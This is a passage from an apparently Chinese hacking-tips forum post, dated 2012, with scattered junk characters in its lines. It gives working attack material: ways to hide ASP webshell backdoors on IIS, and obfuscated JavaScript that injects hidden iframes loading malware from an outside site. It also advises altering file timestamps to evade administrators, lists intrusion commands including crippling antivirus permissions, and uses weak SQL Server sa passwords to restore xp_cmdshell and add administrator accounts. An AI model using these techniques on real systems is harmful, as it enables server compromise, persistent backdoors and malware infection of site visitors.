' g" y2 W, c( K5 ~" A+ C用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。* J- A* i2 M$ u2 k
/ H- `: ` S0 j, T$ X53、隐藏ASP后门的两种方法
9 q8 H; N. A* B, k" q1、建立非标准目录:mkdir images..\7 A8 {: r, n) L
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
" u3 M% j. B! \; a通过web访问ASP木马:http://ip/images../news.asp?action=login& \ `. Z- D; A
如何删除非标准目录:rmdir images..\ /s
1 A" l7 ^+ S& ?! r8 `! G" K( c) O2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( m! W! n# ^' S+ ]4 ^mkdir programme.asp5 [/ [- J% l/ r: W# f, G. M
新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 \% R+ p. A% R7 w新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
' `6 R# \' {7 rattrib +H +S programme.asp2 U/ y. X8 }' d8 H2 [0 x5 H
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
4 ]2 g8 V: x, {- e" |, k* R, m, u7 A/ o0 ?* h7 G
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% F3 J' Q8 S! B
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 E" z$ t# r' C; c; L/ V/ o4 K1 G
55、JS隐蔽挂马. [- h) I0 A, T& y. _& s. ]% n
1.
# _6 {( h$ E5 u0 d' k8 d( Lvar tr4c3="<iframe src=ht";
8 G3 h( u+ X% q0 M+ M. Htr4c3 = tr4c3+"tp:/";% }% z! H1 l$ h O4 h
tr4c3 = tr4c3+"/ww";
6 M1 r2 Z: v. \( h9 _9 @/ n6 o3 p) Ntr4c3 = tr4c3+"w.tr4";3 H& ^6 A4 I4 G) B
tr4c3 = tr4c3+"c3.com/inc/m";
# K" B# k' I ^5 e0 p2 _+ t7 U; q* Ytr4c3 = tr4c3+"m.htm style="display:none"></i";' j" X4 s2 a5 F7 J5 M- T* y
tr4c3 =tr4c3+"frame>'";9 A- u# [% P0 N8 }
document.write(tr4c3);
+ f: |+ q/ I' T" C: u" D" f/ k避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
% T' c. T8 x5 ?+ v7 e' g' p: Z2 n# ]4 \3 V6 r$ j
2.8 u9 e6 ~: A8 J! \2 K, U# t8 b8 l
转换进制,然后用EVAL执行。如8 i# U& g9 f7 l
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");3 z/ g" q1 _( z) E
不过这个有点显眼。5 w9 v. D/ `3 V* U8 i: B+ w
3.
# v0 J- I* W9 {/ d0 D D9 N5 bdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');0 T( a ?8 j$ e! J% O
最后一点,别忘了把文件的时间也修改下。& W% x, v# Z8 j* M! n2 T1 a
7 h6 |3 S$ x# h H56.3389终端入侵常用DOS命令( L( m) J" j8 q, j% v( A
taskkill taskkill /PID 1248 /t) F" k) N' ?5 i. ?( f
. D2 M8 o4 k; U9 i) _$ G8 F
tasklist 查进程
1 q3 z- S/ L7 P2 s' M4 r" E5 h4 e' a R/ j# }0 H
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
! a0 n0 b V0 m! g" `: t: p, o; Uiisreset /reboot
+ j- e% H \' S, V! Ttsshutdn /reboot /delay:1 重起服务器
9 Z, H: A3 K$ a5 J* J1 f6 `/ z, i, u6 j/ |/ Y$ _* T+ P0 j
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,3 s: L$ x3 P$ m; Z
+ l4 |4 \8 e6 i& J% t# D% T$ u! \
query user 查看当前终端用户在线情况" b/ B. }& H- ?, v1 g: E* l. f3 f
9 P3 M" }4 ]# G$ n1 X0 v要显示有关所有会话使用的进程的信息,请键入:query process *
: A. w0 }4 @" I
J& {+ l7 Y1 Z要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, N1 @2 C% p. \( Z9 {# G( D3 Z2 P
6 B j# @& {* R; g' q2 e要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
2 }: z. W' F' i) g, z
, _5 L2 C. M5 {3 @: E2 N要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02; d3 g1 O4 H1 @8 ?3 }2 J
; c4 I9 _. _0 I1 ?, G0 N2 ]2 N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启" i' b6 n& i% R% l/ ~- _* q, g
+ `, e9 z$ M3 c% @/ \. n) z命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统" f( d% w e% ^% b& \) `
, [- r5 ]9 @6 U: P% @& m
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
9 h" X# E, }8 \# R" j! P |0 A6 X; ^& H
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ D/ c5 E5 j6 W: U, P
$ q- D0 R$ Q' }8 F6 H2 L7 f56、在地址栏或按Ctrl+O,输入:
3 ?4 f/ y4 Q7 w/ d4 L' q8 r- Fjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
7 E6 P; G4 d+ t& K" S) N" _
9 C* V! C: k; ?$ D源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 l0 G/ B( G/ I6 K+ J+ i# [6 C s5 G4 @' [: d/ O' I
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 ^# A: `2 w' G+ w, m: s+ K+ X
用net localgroup administrators是可以看到管理组下,加了$的用户的。6 g' h, }0 B# X* h
, j0 o! a) L$ d4 J- z58、 sa弱口令相关命令$ B" @0 [8 j+ l2 k. O4 N
, g7 m# b8 p4 W9 k/ f1 c* ]
一.更改sa口令方法:7 n" [# M# N0 e
用sql综合利用工具连接后,执行命令:5 [4 x, d% S! w: l' H9 ~
exec sp_password NULL,'20001001','sa'& Q# _! [$ O8 A
(提示:慎用!)
+ S+ l# m1 N9 u! \4 Y5 r0 g" @" G2 j
二.简单修补sa弱口令.
9 o. }; {/ m7 y. E- x ?( S1 ~; X
方法1:查询分离器连接后执行:
1 _5 ?( X) U1 E& U$ Lif exists (select * from
/ S4 n5 U$ y% C% jdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: j" i7 P( m+ L6 p) `; j6 L) ?
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; o4 A; @5 N3 Q/ t- f% @; S7 B- r$ o. ^- L
; |+ F3 `# V# y# R. yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& \, j) n" m- p8 c* r( R/ Y" r3 F: b5 K. K6 _% [# p5 M/ t1 k) e% S
GO
) W$ R, z& q0 R
. }0 F& j B) N1 @2 i9 ]然后按F5键命令执行完毕
+ G; R2 F3 ^) r( }/ n
! s s+ \8 ~: }# D% j5 o- c方法2:查询分离器连接后
+ I: N! Z) x* T7 m: @& d第一步执行:use master. J% H+ i1 y* U) w8 b. M+ C% h
第二步执行:sp_dropextendedproc 'xp_cmdshell'" b: R3 L% n6 T' K; T$ u8 ^% H
然后按F5键命令执行完毕
+ D, O# n2 g' u+ v% K
. k8 |- G4 m$ w1 l
. v- ?5 \8 H; Q; |3 B( U三.常见情况恢复执行xp_cmdshell.( o$ s% p j- h7 @' G
$ v6 [7 f6 ]3 H% A$ ^3 @4 v3 n$ O2 {# k( b% d0 f+ m; ~
1 未能找到存储过程'master..xpcmdshell'.$ ?( N; N& N6 w: d8 K
恢复方法:查询分离器连接后,
# K% ^ a; W2 A第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 b' I, K3 S9 Y: a$ D7 F, D, H第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ k1 ~' C: F, _" [( t& {2 Q然后按F5键命令执行完毕' `3 S; ?$ \7 f* I; ~
. ]& V `% @9 c9 q& `$ M2 J2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). p F2 s. y0 P5 v
恢复方法:查询分离器连接后,1 F+ C4 P5 S2 o; f# ]
第一步执行:sp_dropextendedproc "xp_cmdshell"0 k7 Q: r/ b/ G6 S; m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. u; [$ G. k/ E5 v
然后按F5键命令执行完毕! V$ E# |2 f g- F. i
}# F8 w8 t( x+ a- _
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)/ E& m T: C1 Q4 ~1 n, g
恢复方法:查询分离器连接后,
; e+ m" K$ m" \, h+ @第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
Y/ O0 z6 Y% W! c: g3 B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* f8 O% Z( k3 z4 i D$ _然后按F5键命令执行完毕
7 c6 T' H0 }+ u; k7 u
. A' } {# ? q( g2 z四.终极方法.: {. N- B6 c0 ^+ n& M7 |8 h
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
% V7 R# `; c; Y) R, t( h( ]查询分离器连接后,
) l \: P' _( Y& b: d, Z2000servser系统:- g& J) F4 ?! o5 Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'$ Q7 z, {& Z6 w' D
& x3 n; f6 I# c' Z0 U4 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% ^. h+ c) f! M9 c, T3 K" O2 P1 O7 {+ ~" k1 A. @' W; y
xp或2003server系统:
, b: v* Q* X& N4 f# D0 s7 S9 g' S+ T! }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'; X4 ~+ K) y2 f1 {" m2 I9 g
: I+ s) Y; c# G s2 ^% J& S. e6 wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( i* D) {" z) l7 k+ E! f2 e |
发表于 2012-9-15 14:51:03
收藏
支持
反对